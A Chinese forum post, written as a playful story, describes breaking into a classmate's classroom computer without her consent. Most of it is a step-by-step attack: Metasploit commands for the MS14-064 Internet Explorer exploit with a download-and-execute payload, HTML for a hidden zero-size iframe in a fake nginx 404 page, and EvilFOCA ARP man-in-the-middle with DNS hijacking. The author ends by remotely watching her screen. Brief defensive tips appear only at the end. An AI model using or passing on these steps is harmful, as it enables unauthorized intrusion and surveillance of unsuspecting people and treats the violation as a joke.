本帖最后由 匿名 于 2018-11-21 16:25 编辑
0X00 引言 某日计算机课,被妹子请教学习上的问题。聊着聊着就上课了,但是还没有帮妹子解决问题,妹子一面无奈地回到了自己的位置。作为一个“技术宅”,怎么能容忍解决不了妹子的问题;为了能够保住在妹子心中技术流的形象。不做一个半途而废的人,一定帮妹子解决问题。
但是又作为一个伪高冷的人,主动去找妹子帮她解决问题好像有点不妥,毕竟是个伪高冷的人啊。
为了能够保住在妹子心中的形象,绞尽脑汁不得其解。这时候我问旁边的二狗:“二狗,刚才xxx找我请教问题,但是还没有解决,怎么办?“
二狗:”那就过去帮她解决呗“
小V:"没看到老师都准备讲课了吗,是不是玩手机玩傻了....."
二狗:“你不是很厉害嘛,可以控制她电脑啊,这样就不用过去了”
听二狗这样一说,真是一言惊醒梦中人啊,我控制她电脑不就得了嘛。话刚完,马上做解除电子教室的控制准备,查看本机安装有的软件情况和系统安全补丁的安装情况。毕竟机房所有电脑都是一样的,我电脑存在的漏洞妹子机器也一样存在啊。
机房教学使用的系统是Windows7 Sp1,要是xp或者vista还可以尝试SMB溢出啊,这可是Win7。
虽然是Win7,但是经过简单的探测,发现没有打过补丁,安装的java为1.6.x,flash player版本为16.x,winrar3.x还有office等等。看到这里,各位老司机肯定会一面鄙视说的说一句"我靠,你这简直就是一台靶机"。
经过上面的探测,发现也本机存在一个2014年IE的“IE远程代码执行漏洞”,我决定就使用它,毕竟教学使用的系统除了ie并没有安装其他浏览器,猜测妹子可能使用Ie浏览网页。
既然漏洞有了,那么我如何才能让妹子浏览网页的时候打开我制作好,存在漏洞的页面呢?毕竟要妹子机器打开网页才能触发漏洞啊。
这是一个问题啊,停顿了三秒,想到我电脑和妹子电脑不是同一个网关嘛,完全可以搞个中间人攻击,dns劫持啊。让她访问的所有网站dns都解析到到本机的ip,再在本机开启一个web服务,把预先设定好存在IE漏洞的页面放到上面不就成了?嗯,妹子有了,漏洞有了,思路也有了,接着就是部署环境...
0X01 生成漏洞页面
这时候当然要祭出别人说可以黑掉火星的Metasploit漏洞利用框架啦。如果是你,你会去下载一个吗?反正我不会....
如果是我,我肯定会拿出随声携带的U盘,把最近火了一把的PentestBox 优雅的copy到电脑,打开PentestBox.exe输入 msfconsole,苍劲有力地用手指一敲回车。(PentestBox,一个便捷绿色的渗透测试盒子)
选择漏洞利用模块
[Bash shell] 纯文本查看 复制代码 use exploit/windows/browser/ms14_064_ole_code_execution
把 AllowPowershellPrompt 设置true(允许exploit尝试Powershell) [Bash shell] 纯文本查看 复制代码 set AllowPowershellPrompt true
[Bash shell] 纯文本查看 复制代码 set SRVHOST 172.17.70.222 SRVHOST 设置为本机ip
[Bash shell] 纯文本查看 复制代码 set uripath / 设置漏洞页面 为 / (根目录)
[Bash shell] 纯文本查看 复制代码 show target //查看可选目标
可以看到,此模块默认目标为Windows Xp ,所以我们要执行
[Bash shell] 纯文本查看 复制代码 set target 1 //把目标设置设置为Windows 7 (我们的攻击目标就是win7)
漏洞模块配置好后,我们还需要设置一个Payload。你可以通过
[Bash shell] 纯文本查看 复制代码 show payloads //查看可用payloads
如图,你会发现有很多可用的payload,这里就选择一个觉得它比较顺眼的。恩,就它。download_exec
[Bash shell] 纯文本查看 复制代码 set payload windows/download_exec
[Bash shell] 纯文本查看 复制代码 show option
选择download_exec后,可以看到需要设置一个可执行文件下载路径,这个,你喜欢的好~
一切准备就绪后,执行exploit...漏洞页面生成完毕...嵌入到我们的网页即可..
0X02 制作Dns劫持跳转网站
既然我们要通过中间人攻击,劫持妹子电脑的dns,把所有网站都解析到我本机。所以,我要在本机搭建一个Web服务器。我选择的是轻量级的Nginx1.1.5便捷版本。
启动nginx.exe,修改html目录下的index.html,例如:
[HTML] 纯文本查看 复制代码 <!DOCTYPE html>
<html>
<head>
<title>Error</title>
<style>
body {
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
<iframe src=http://172.16.70.222:8080/ width=0 height=0></iframe>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
</body>
</html>
//172.16.70.222:8080/ 为上面生成的漏洞页面
为什么<iframe> 标签下面加那么多行注释呢?因为自定义的404页面必须大于512字节,才能正常显示。所以,我就多加了几个注释。
大功告成,只要对妹子电脑进行中间人攻击,妹子访问baidu.com就可以解析到我的电脑的80端口啦,然而我电脑的80端口的web页面已经通过iframe (上面html) 标签嵌入了一个存在Ie漏洞的页面。只要妹子访问我的电脑即可触发漏洞。
但是有一个问题,我要dns劫持把所有域名解析到我电脑的ip地址,那么妹子访问http://baidu.com/s?wd=meizi,劫持后会变成http://172,16.70.222/s?wd=meizi,这样的话漏洞肯定不能触发啊,这都变成一个404页面了,我只是在首页(index.html)嵌入了漏洞页面。
这也是一个问题,沉思了三秒,既然我们用的是nginx,我们完全可以修改nginx.conf,自定义404页面,在404页面同样也嵌入漏洞页面,说干就干....
打开nginx.conf ,找到 #error_page 404 /404.html;这一行,把前面的#号去掉,取消注释。
然后到nginx目录下新建一个404.html的文件,把index.html的内容复制一份到404.html。这样的话所有404(不存在)页面都会显示404.html的内容了。这样一来,不管妹子访问http://baidu.com or http://baidu.com/s?wd=meizi,漏洞都会触发啦。
0X03 中间人攻击-DNS欺骗
万事俱备,只欠东风。嗯,我们就来制造东风。
这个时候,要是有个kali多好...分分钟都能在原网页上直接触发...
既然我们在windows环境下,只能使用windows下的工具了,这里呢,就直接使用EvilFOCA。
由于是ipv4网络,所以切换到MITM ipv4
选择好:
Gateway (网关)
Targets(妹子电脑ip,可多个)
完成后点击Start,然后你就成了妹子和网关之间通讯的”中间人“然后就可以写各种抓包规则了。
当然,我的目的是Dns劫持...所以,需要切换到Dns劫持模块。
所有域名都解析到我本机的ip上,只要妹子打开网页就能触发漏洞,我就会得到妹子电脑的权限。
进过漫长等待,讲台上的老师终于解除了电子教室控制。这时候估计妹子也开始打开弱不禁风的ie流量网页了找资料了。滴滴滴...滴滴滴...有一个妹子上线...马上关闭dns劫持
和妹子对话既然已经得到妹子电脑权限了,那我完全可以利用我现在拥有的权限发送一个聊天窗口到妹子电脑。 当窗口弹出时,通过远程观看妹子电脑屏幕,妹子正在不停的狂点关闭...似乎并没有什么用.... 0X04 End
如果是小白你觉得很神奇,哇,为什么妹子用ie访问个网页就就被黑了啊?还有你为什么能够成为妹子和网关通讯的中间人啊?如何防范啊?1,只要你的系统打上安全补丁即可避免漏洞导致被黑。java,flash等等尽量不要使用低版本的。2,在交换机和pc机上进行双向MAC地址绑定即可防范中间人攻击。
由于水平有限,文章没什么技术含量,只是当小故事写...希望能够得到一个90的账号,更好的学习...
|